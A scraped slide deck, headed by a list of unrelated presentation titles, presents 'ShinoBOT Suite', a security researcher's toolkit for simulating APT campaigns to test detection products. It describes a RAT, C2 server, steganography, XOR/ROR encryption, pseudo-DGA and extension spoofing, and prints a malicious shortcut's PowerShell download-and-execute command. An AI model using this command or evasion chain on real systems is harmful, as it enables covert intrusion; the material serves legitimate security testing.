"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
 
Day 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio FundamentalsDay 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio Fundamentals
 
ScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking ReplicationScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking Replication
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
 
What is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE?  Session 1 – CoE VisionWhat is an RPA CoE?  Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE Vision
 
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and BioinformaticiansBiomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
 
Getting the Most Out of ScyllaDB Monitoring: ShareChat's Tips
Getting the Most Out of ScyllaDB Monitoring: ShareChat's TipsGetting the Most Out of ScyllaDB Monitoring: ShareChat's Tips
Getting the Most Out of ScyllaDB Monitoring: ShareChat's Tips
 
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge GraphGraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
 
MySQL InnoDB Storage Engine: Deep Dive - Mydbops
MySQL InnoDB Storage Engine: Deep Dive - MydbopsMySQL InnoDB Storage Engine: Deep Dive - Mydbops
MySQL InnoDB Storage Engine: Deep Dive - Mydbops
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
 
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdfLee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
 

ShinoBOT Suite

  • 1. ShinoBOT SUITE The APT Simulator Tool Kit @Sh1n0g1 1
  • 2. About ME  Shota Shinogi @Sh1n0g1  http://shinosec.com  Security Researcher at Macnica Networks Corp. Japanese Disty of security/network products  Enthusiast of writing (ethical) malware  Presented ShinoBOT (not Suite) last year at Arsenal 2
  • 3. ShinoBOT the RAT ShinoBOT.exe ShinoBOT is a RAT (simulator)  Presented at Black Hat USA 2013 Arsenal  It connects to ShinoC2, the C&C Server using HTTP(S).  What you can do with ShinoBOT via ShinoC2 Execute a command Upload / Download a file Take a screen shot  It is a SIMULATOR it has a GUI you need the password which is showed on the GUI to control it 3
  • 4. What is ShinoBOT Suite ShinoBOT Suite is a tool kit to create an APT attack with just a few clicks, to simulate a highly- sophisticated attack campaign.  What is contained Exploit (Shortcut contains a malicious script) Malware Delivery Server (ShinoMAL.mooo.com) Downloader/Dropper (ShinoDownloader.exe) RAT (ShinoBOT.exe) C&C Server (ShinoC2] Steganography, crypto, DGA and some evasion techniques 4
  • 5. Why ShinoBOT Suite ?  There is a bunch of new security tools to detect/response the unknown threat Sandbox based Malware Detection System ETDR (Endpoint Threat Detect & Response) SIEM (Security Information & Event Manager) Security Analytics / Network Forensics  It is hard to evaluate those new products Known malware will be detected by signature ♦ ≠ Unknown Threat To simulate a realistic APT ♦ requires a high skill ♦ takes too much time ♦ spends a lot of money using some commercial tools 5
  • 6. ShinoBOT Suite Campaign Malicious Shortcut Downloader Dropper RAT Decoy File C&C Server Malware Deploy Server dldr_tmp ShinoBOT.exe 5)Download 4)Open 8)C2 Communication 1)Download 2)Execute img.jpg 3)Drop 6)Decrypt 7)Execute 6
  • 7. ShinoBOT Suite Campaign Malicious Shortcut Downloader Dropper RAT Decoy File C&C Server Malware Deploy Server dldr_tmp ShinoBOT.exe 5)Download 4)Open 8)C2 Communication 1)Download 2)Execute img.jpg 3)Drop 6)Decrypt 7)Execute 7 ShinoMAL ShinoC2 ShinoBOT Shino Downloader
  • 14. 14 DEMONSTRATION CONTROL1 To control ShinoBOT (RAT), you need to grab the password, it is to prevent the abuse of ShinoBOT. ShinoBOT saved its password to the same folder (C:Users%USERNAME%sb.pas) You can access to the password word file remotely. %MACHINENAME%C$Users%USERNAME%sb.pas
  • 15. 15 DEMONSTRATION CONTROL2 To control ShinoBOT (RAT), you need to grab the password, it is to prevent the abuse of ShinoBOT. ShinoBOT saved its password in this text file. (C:Users%USERNAME%sb.pas) You can access to the password word file remotely. %MACHINENAME%C$Users%USERNAME%sb.pas  This password protection is to prevent the real guys to abuse ShinoBOT.
  • 16. 16 DEMONSTATION CONTROL3 Access to ShinoBOT.com Go to the host list Your host will appear in the host list Click the [View/Assign Jobs] link
  • 17. 17 DEMONSTATION CONTROL4 Put the password to see the Loot (result) of the command Put the password to assign a new job
  • 18. Technical Detail 1 Malicious Shortcut "target" of the shortcut (all in 1 line) cmd.exe /c powershell (new objectSystem.Net.WebClient) .DownloadFile('DOWNLOADERURL', '%TEMP%LicenseRnd.txt'); & %TEMP%LicenseRnd.txt & ::DECOYFILENAME POWERSHELL downloads the downloader, and save it CMD executes the downloader(Rnd means random string) CMD ignores this line because :: means a comment 18
  • 19. Technical Detail 2 Extension Spoofing On the target of shortcut, there is the line "%TEMP%LicenseRnd.txt" (previous slide) Usually, when you double click the file with .txt, the notepad will launch CMD.exe can execute the executables(contains the MZ header) with any extension ShinoBOT Suite uses this techniques to spoof the extension, and make the donwloader hard to be found from the disk Actually, it is the ShinoDownloader.exe 19
  • 20. Technical Detail 3 Crypto Stuff ShinoBOT Suite uses XOR and ROR (4 bit rotate) Key is used just for the XOR, and ROR is always 4 bits ShinoBOT Suite generates a random key (200 ~ 255 byte) so it is little bit difficult to decrypt the whole file without having the key 20
  • 21. Technical Detail 4 Steganography The encrypted RAT is hidden in the kitten image. JPG data Encrypted RAT [Binary Visualizer] 21
  • 22. 22 Technical Detail 5 Domain Generation Algorithm ShinoBOT (the RAT) uses pseudo-DGA. It generates a random host name for the C2 Server. rrrr.r.shinobot.com " r " is replaced by a random character. The DNS of shinobot.com responds any host with the C2 server IP address.
  • 23. All Components are customizable, modulable Exploit ShellCode Downloader Dropper RAT Decoy File C&C Server Malware Deploy Server KB1234567.exe Invitation.pdf Invitation.pdf (legitimate) ShinoBOT.exe 5)Download 4)Open 8)C2 Communication 1)Download 2)Execute img.jpg 3)Drop KB1234567.exe 6)Decrypt 7)Execute Phishing Email 23
  • 24. Thank you Visit my site and get the recipe of ShinoBOT SUITE. http://shinosec.com 24